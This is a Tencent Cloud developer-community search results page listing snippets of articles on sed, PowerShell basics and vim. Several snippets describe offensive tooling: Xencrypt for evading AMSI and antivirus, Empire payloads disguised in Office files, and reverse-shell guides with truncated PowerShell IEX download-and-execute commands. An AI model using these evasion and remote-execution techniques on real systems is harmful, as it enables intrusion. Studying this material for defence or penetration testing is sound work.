基于模式匹配插入多行的Powershell脚本 - 腾讯云开发者社区

Xencrypt 今天给大家介绍的这款工具名叫Xencrypt，它是一款基于PowerShell脚本实现的反病毒绕过工具。...如果你不想花时间对类似invoke-mimikatz这样的PowerShell脚本进行混淆处理以避免其被检测到的话，那么Xencrypt就是你的最佳选择了。...Xencrypt能够自动对目标脚本代码进行处理，并且可以生成近乎无限量的变种代码，以帮助研究人员绕过基于签名机制的反病毒检测产品。...从本质上来说，Xencrypt是一款PowerShell代码加密工具，它使用了AES加密算法以及Gzip/DEFLATE压缩算法来对目标脚本代码进行处理，并生成一个完全不同的脚本，但功能却一模一样。...功能介绍当前版本的Xencrypt拥有以下几种强大的功能： 1、绕过AMSI以及VirusToal上目前所使用的所有现代反病毒检测引擎； 2、压缩和加密PowerShell脚本； 3、资源消耗和开销非常小

1K1 0

《模式识别与智能计算》基于PCA的模板匹配法

算法流程：选取各类全体样本组成矩阵X,待测样品计算协方差矩阵S 根据S的特征值选取适合的矩阵C 使用矩阵C降维采用模板匹配开始多类别分类算法实现 PCA降维算法 def pca(x,k=0,percent...= 0.9): """ :function: 主成分分析法 :param X: 数据X m*n维 n表示特征个数，m表示数据个数 :param K: K表是要保留的维度...np.mean(x,axis=0) mean.shape = (1,n) x_norm = x - mean x_norm = x_norm.T # 将它变成行列分别为特征的矩阵...: sum += eigval_ratio[i] if sum > percent: return eigvec_sort[:,:i+1] 模板匹配算法...def neartemplet(x_train,y_train,sample): """ :function: 模板匹配法 :param X_train: 训练集 M*N M

7363 0

您找到你想要的搜索结果了吗？

是的

没有找到

1.PS编程入门基础语法

中Shell使用类似, 但是不同的是它传递的数据不是文本而是对象; 管道的处理模式: 1.顺序模式（较慢）：在顺序模式中管道中同一时间只执行一条命令，只有当前一条命令的所有执行完毕，才会把所有结果交付给下一条命令...称为管道元素）将其输出逐项传递到管道中的下一个命令 1.传统的Cmd管道是基于文本的，但是Powershell是基于对象 2.管道中传递是对象可以作为下一个cmdlet的参数 3.它可以减少使用复杂命令的工作量...Export-Clixml: 创建对象的基于 XML 的表示形式并将其存储在文件中。...- % 2) 比较运算符: PowerShell 包含许多比较运算符，用于比较值或查找与特定模式匹配的值。...'PowerShell' -replace 'Shell' # Power # 如果要将值替换为其他值，请在要替换的模式之后指定新值。

20.8K2 0

Linux学习----文本三剑客——sed（马哥教育原创）

-r: 支持扩展正则表达式； -n: 静默模式； -e script1 -e script2 -e script3：指定多脚本运行； -f /path/to/script_file：从指定的文件中读取脚本并运行...new line字样 sed ‘1a \new line\nsecond line\ntherid line’ #\n表示换行符 i \text：插入text，支持\n实现多行插入； c \text：...； D：删除多行模式空间中的首行；注意：命令功能可使用!...插入text，支持\n实现多行插入； c \text：用text替换匹配到的行；sed ‘/5,7/c \new txt’ #五到七行都替换成一个new txt sed ‘/^#/c \new txt...； d：删除模式空间中的内容； D：删除多行模式空间中的首行；注意：命令功能可使用!

1.4K3 0

PowerShell渗透–Empire

0x00 简介 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe...,是一个基于PowerShell的远控木马(www.powershellempire.com) 0x02 安装 git clone https://github.com/EmpireProject/Empire.git...uselistener 用来设置监听模式 uselistener 查看可以使用的监听模式 uselistener http 采用http监听模式，输入info 查看具体参数设置...为了增加迷惑性，可以将bat文件插入一个office文件（word/excel）中，依次选择插入—对象—选择“由文件创建”—通过浏览“选定bat文件”—勾选“显示为图标”—“更改图标”从而获得更好的迷惑性...杀软反应还是很迟钝的，慢了7,8分钟，应该是本地病毒库没有匹配到特征在云端分析的 ? 将样本上传virustotal进行分析，57家只有一家能够准确识别该宏病毒，除了白利用，这种效果还是很理想的。

2.2K2 1

1.Powershell基础入门介绍与安装升级

PowerShell 基于对象而非文本，所以输出是基于对象的。 PowerShell 基于.NET Framework 构建它与 C# 编程语言共享一些语法功能和关键字。...面向对象:PowerShell 基于对象而非文本交互式脚本编写环境:Windows 命令提示符提供了一个可访问命令行工具和基本脚本的交互式 shell 轻松转换到脚本：借助 PowerShell 的命令可发现性...* 启用 PowerShell 脚本：可便于将 PowerShell 命令输入和输出捕获到基于文本的脚本中。...：新增了 ISE 兼容性模式集成控制台中的 PSReadLine，包括语法突出显示、多行编辑和退回搜索提升了稳定性和性能新增了 CodeLens 集成提升了路径自动完成 Tips ：若要更轻松地转换到...Tips ：快速编辑模式和标准模式的切换可以通过控制台标题栏->鼠标右击->属性->选项->编辑选项。 PS快捷键: Powershell的快捷键和cmd以及linux中的shell 都比较像。

7.2K2 0

狩猎二进制重命名

我提供了一个带有卸载说明的 Powershell 安装脚本，支持 Powershell 2.0 及以上。...示例程序的模板可以在这里找到 WMIEvent-BinaryRename.ps1。 Yara 检测 Yara 是一个主要用于恶意软件检测的模式匹配工具。...基于字符串或者二进制模式的规则，利用布尔、计数或者正则表达式之类的匹配逻辑。虽然传统上仍然是基于模式的匹配，但是 Yara 是模块化、可扩展的。...Florian Roth 在 2014 年写了一篇关于“inverse”技术的文章，文中阐述了如何利用 Powershell 脚本获得所有需要扫描的文件，并将每个文件名作为外部变量传递给 Yara 进行扫描...值得注意的是，Yara 扫描可以针对没有文件名匹配时聚焦于域内文件的意外位置，但这并不符合二进制重命名的需要。 Powershell 检测这种情况下，首选的方式变成了 Powershell。

1.3K2 0

反弹shell的学习总结 - Part 2

2.4 Empire反弹shell Empire（https://github.com/EmpireProject/Empire）基于powershell的后渗透攻击框架，可利用office宏、OLE对象插入批处理文件...注意：如果要生成基于VBS的Powershell代码，设置完listener和userstager之后，不用输入execute，直接输入back，然后输入Launcher powershell shuteer...2.5 PowerSploit PowerSploit是又一款基于powershell的后渗透攻击框架。...将生成的test文件复制到python搭建的web服务器中，于是有：http://192.168.1.18:9889/test step 3：在目标机上执行powershell下载脚本 powershell...2.5.2 DLL注入反弹shell 使用模块的是Invoke-DllInjection.ps1，它是一个DLL注入的脚本，首先还是要下载脚本： powershell IEX (New-Object System.Net.Webclient

1.9K3 1

《Linux命令行与shell脚本编程大全》第二十一章 sed进阶

在sed编辑器读取数据流时，它会基于换行符的位置将数据分成行，一次处理一行数据。有时会需要对跨多行的数据执行特定操作。...合并文本行（多行版本的next）单行next命令会将数据流中的下一文本行移动到sed编辑器的工作空间（称为模式空间）多行版本的next命令（N）会将下一行添加到模式空间中已有的文本后。...sed编辑器提供了一个方法来改变命令脚本的执行流程，其结果与结构化编程类似。 21.4.1 分支 sed编辑器提供了一种方法可以基于地址、地址模式或地址区间排除一整块命令。...21.5.1 &符号 &符号可以用来代替替换命令中的匹配的模式。不管模式匹配的是什么样的文本。...第一次先匹配到了12345 678，然后插入一个, 第二次匹配到了12 345,678，然后插入一个逗号第三次匹配不到了 21.6 在脚本中使用sed 21.6.1 使用包装脚本可以将sed编辑器命令放到

1.7K9 0

Powershell基础入门与实例初识

[TOC] 0x00 前言简介微软官网:PowerShell 是构建于 .NET 上基于任务的命令行 shell 和脚本语言。...PowerShell 基于对象而非文本，所以输出是基于对象的。 PowerShell 基于.NET Framework 构建它与 C# 编程语言共享一些语法功能和关键字。...面向对象:PowerShell 基于对象而非文本交互式脚本编写环境:Windows 命令提示符提供了一个可访问命令行工具和基本脚本的交互式 shell 轻松转换到脚本：借助 PowerShell 的命令可发现性.../powershell-online-tutorials 0x01 PS模式和快捷键 PS控制台有两种模式: 快速编辑模式和标准模式的切换可以通过控制台标题栏->鼠标右击->属性->选项->编辑选项...Powershell标准模式(默认)：鼠标右击选择标记后才能实现复制和粘切功能。 Powershell快速编辑模式：可以通过鼠标左键选择任意矩形区域内的文本，并且鼠标右击实现复制功能。

4.3K2 0

Sed三剑客入门与进阶

sed表达式 sed脚本是一个sed的命令清单，启动Sed时以-f选项引导脚本文件名。...$ sed -f sed.script test.txt 1 1 0 0 0 1 1 0 0 0 1 1 0 0 0 ---- 0x03 增删改查命令单行插入和多行插入 #头部插入（行上）：i...5行之前插入this is a test line sed -i '5i\this is a test line' test.conf #多行插入：在test.conf文件第5行前插入first insert...is a test line： sed -i '2a\this is a test line' test.conf #多行插入：在test.conf文件第5行后插入first insert \n seconde...从文件读入：r命令描述:file里的内容被读进来，显示在与test匹配的行后面，如果匹配多行，则file的内容将显示在所有匹配行的下面 #示例1.读取file文件中的到并且插入到查找到test字符串的后面

3.1K1 0

sed 使用教程 - 通读篇（30分钟入门系列）

如果你遇到一下场景，可以考虑使用sed 配置文件模板在具体的环境需要用脚本替换配置，这一般运用在部署脚本上，根据当前环境的配置信息对配置文件的一些配置信息进行替换；批量替换和处理一些文本信息；格式化文本的内容...后的一行也有cat，但并没有继续+2插入，而是相当于匹配的index+2之后继续匹配，往下又匹配到了cat，再执行同样的过程，有点绕，仔细看看例子你就会发现端倪。...删除 d 由于sed命令是基于行为单位处理的，所以这里也是删除行，而且删除的是模式空间的缓存，只会影响输出，不会影响原来文件，格式如下：命令格式：[address1[,address2]]d 例如删除匹配到...只将匹配到的内容写入新的文件 sed的多行处理功能前面所看到的sed编辑器命令都是针对单行数据执行操作的，在sed编辑器读取数据流时，它会基于换行符的位置将数据分成行，让后再每行中重复的执行脚本命令...输出多行中的第一行 P P命令用于输出N命令创建的多行文本的模式空间中的第一行,也就是说读进来两行，仅输出第一行。

4.3K24 0

vim 个性化设置

前言最近在开发的一个脚本工具集中需要实现对各单个工具脚本的版本管控，作为懒癌晚期患者，对于繁琐的事情一向是很反感的。于是趁着这个机会学习和应用一下vim的自定义函数以及一些常规操作。...以下脚本实现了F1插入shell文件头，F2插入python文件头，F5更新文件头中日期，F6更新工具版本（没有对应版本行时插入版本行）本文脚本已上传github: https://github.com..."* ci( 删除一对 () 中的所有字符并进入插入模式 "* ci 中的所有字符并进入插入模式 "* ci{ 删除一对 {} 中的所有字符并进入插入模式 "* cit 删除一对 HTML.../XML 的标签内部的所有字符并进入插入模式 "* ci” ci’ ci` 删除一对引号字符 (” 或 ‘ 或 `) 中所有字符并进入插入模式 " "* vi[ 选择一对 [] 中的所有字符 "* vi...*bill/ 标准正则表达式 " /^[A-J]\+/ 找一个以A~J中一个字母重复两次或以上开头的行 " /forum$\_.$*pent 多行匹配

1.5K2 0

反弹shell | 反弹shell总结

PowerShell 是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...一旦攻击者可以在一台计算机上运行代码，他们便可以下载powershell脚本文件（.ps1）到磁盘执行，脚本可以在内存中运行(无文件化)。...PowerShell的攻击框架，集合了一些PowerShell攻击脚本和有效载荷，可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。...2.4 Empire反弹shell Empire（https://github.com/EmpireProject/Empire）基于powershell的后渗透攻击框架，可利用office宏、OLE对象插入批处理文件...2.4.4 Empire产生VBS木马反弹shell use stager windows/launcher_vbs execute 在靶机上运行该VBS脚本即可注意：如果要生成基于VBS的Powershell

3.5K2 1

sed & awk 第二版学习（五）—— 高级 sed 命令

一、多行模式空间模式匹配是面向行的。像 grep 这样的程序尝试在单个输入行上匹配一个模式，这就使它很难匹配一个在行尾处开始，并在下一行的开始处结束的短语或句子。...模式空间最初的内容和新的输入之间用换行符分隔。在模式空间中嵌入的换行符可以利用转移序列“\n”来匹配。在多行模式空间中，元字符“^”匹配模式空间中的第一个字符，而不匹配换行符后面的字符。...这就是第一条指令尝试匹配所有出现在一行上的文本字符串的原因。 2. 多行删除多行删除命令（D）删除模式空间中直到第一个嵌入换行符的这部分内容。...它也可以用于避免执行某个基于一个模式匹配的过程，例如： /^\.ES/,/^\.EE/b s/^"/``/ s/"$/''/ s/"? /''?...如果一个输入行不匹配这个模式，则开始下一个过程来创建多行模式空间。新行本身可能匹配这一搜索字符串。这里的策略是，如果第二行匹配模式，则输出第二行。 N h s/.

1291 0

Windows 10 S中的Device Guard详解（上篇）

DG是基于WindowsVista中引入的内核模式代码完整性（KMCI）和Windows 8 RT中引入的用户模式代码完整性（UMCI）。...DG包含诸多限制代码执行的特性，基于一组策略规则限制什么类型的可执行文件/脚本（包括DLL）可以加载。要找到在带DG的系统中运行任意代码的方法，我认为第一步是要提取DG策略并检查其缺陷。...MattGraeber编写了一个可将二进制格式转换回XML格式的Powershell脚本。但原始脚本有些问题，因此我做了一些修改，以完全支持Win10S中使用的策略格式，并修复了一些bug。...将脚本加载到Powershell中，然后运行以下命令： ConvertTo-CIPolicywinsipolicy.p7b output.xml 转换后得到我们可以阅读的XML文件。...缺少的是未使用任何基于Hyper-V的执行——以通过HyperGuard或HVCI代码完整性执行限制删除策略或确保内核模式完整性。

2.8K11 0

《Linux命令行与shell脚本编程大全》第十九章初识sed和gawk

指定gawk的兼容模式或警告等级它的强大之处在于程序脚本，可以写脚本来读取文本行中的数据，然后处理并显示数据，创建任何类型的输出报告。...替换命令语法： s/pattern/replacement/flags flags有四种选项：数字：表明新文本将替换第几处模式匹配的地方。...sed编辑器的正常输出是在STDOUT中，而只有那些包含匹配模式的行才会保存在指定的输出文件中。...sed编辑器在文本模式中采用了一种称为正则表达式的特性来帮助你创建匹配效果更好的模式。就是上面的 pattern。 3. 命令组合还可以控制多条命令在指定行中运行。...还可以用文本模式来寻址：对包含line 3的地方进行修改。这个会修改多行。如果匹配到多行的话。

1.9K5 0

linux-shell脚本命令之sed

打开一个比較大的文件会消耗非常多内存。 2. 我们无法写脚本调用vim来编辑文件, 可是sed能够通过写脚本编辑文件。...(当前行从模式空间删除, 下一行读入模式空间) sed ‘/^a/ {n;s/b/B/g}’ ccc.txt # 匹配以a开头的下一行整行, 使用 B 替换 b. 3....N 为读取多行内容到模式空间: (当前行和下一行都在模式空间中) sed ‘/^A/{s/tb/TB/; N; s/t\nb/TB \n/}’ ccc.txt # 匹配以 A 开头的行,...使用多行模式空间的话, ^ 就不是行的开头, 而是模式空间的开头; $ 就不是行的结尾, 而是模式空间的结束....a 的那一行,把它们保存在保持空间并从模式空间删除;匹配含有b的那一行,把保持空间内容放到模式空间; 6. set里面没有循环, 假设想实现循环的效果, 能够借助标签发布者：全栈程序员栈长，转载请注明出处

7172 0

Windows PowerShell ISE 是什么和 PowerShell 有什么区别

其实最开始的理解就是 PowerShell 的升级版，真正用过 PowerShell 的童鞋对在 PowerShell 中进行编辑命令应该是非常头痛的。...Windows PowerShell ISE 可以理解为在一个记事本中增加了 PowerShell 的功能，可以在记事本中进行的操作在 PowerShell ISE 基本上都可以进行。...PowerShell ISE 是什么 Windows PowerShell 集成脚本环境 (ISE) 是 Windows PowerShell 的主机应用程序。...在 Windows PowerShell ISE 中，可以在单一 Windows 图形用户界面中运行命令以及编写、测试和调试脚本，该用户界面具有多行编辑、Tab 补齐、语法着色、选择性执行、上下文相关帮助等功能...运行可以在 Windows 10 中的搜索中，搜索 PowerShell 。然后将光标在左侧移动，选择 Windows PowerShell，在由此的扩展窗口中，可以看到有 ISE 的选项。

3.7K0 0

Linux：sed命令详解

3.1 sed 命令命令功能 a\ 在当前行后添加一行或多行。多行时除最后一行外，每行末尾需用“\”续行 c\ 用此符号后的新文本替换当前行中的文本。...多行时除最后一行外，每行末尾需用"\"续行 i\ 在当前行之前插入文本。...多行时除最后一行外，每行末尾需用"\"续行 d 删除行 h 把模式空间里的内容复制到暂存缓冲区 H 把模式空间里的内容追加到暂存缓冲区 g 把暂存缓冲区里的内容复制到模式空间，覆盖原有的内容 G 把暂存缓冲区的内容追加到模式空间里...而G命令则把暂存缓冲区的内容追加到了模式空间的当前行后。此处即追加到了末尾。 7. sed 脚本 sed 脚本就是写在文件中的一列 sed 命令。脚本中，要求命令的末尾不能有任何多余的空格或文本。...执行脚本时，sed 先将输入文件中第一行复制到模式缓冲区，然后对其执行脚本中所有的命令。每一行处理完毕后，sed 再复制文件中下一行到模式缓冲区，对其执行脚本中所有命令。

7.1K6 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

Xencrypt：一款基于PowerShell脚本实现的反病毒绕过工具

《模式识别与智能计算》基于PCA的模板匹配法

1.PS编程入门基础语法

Linux学习----文本三剑客——sed（马哥教育原创）

PowerShell渗透–Empire

1.Powershell基础入门介绍与安装升级

狩猎二进制重命名

反弹shell的学习总结 - Part 2

《Linux命令行与shell脚本编程大全》第二十一章 sed进阶

Powershell基础入门与实例初识

Sed三剑客入门与进阶

sed 使用教程 - 通读篇（30分钟入门系列）

vim 个性化设置

反弹shell | 反弹shell总结

sed & awk 第二版学习（五）—— 高级 sed 命令

Windows 10 S中的Device Guard详解（上篇）

《Linux命令行与shell脚本编程大全》第十九章初识sed和gawk

linux-shell脚本命令之sed

Windows PowerShell ISE 是什么和 PowerShell 有什么区别

Linux：sed命令详解

扫码

相关资讯

热门标签

活动推荐

运营活动

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐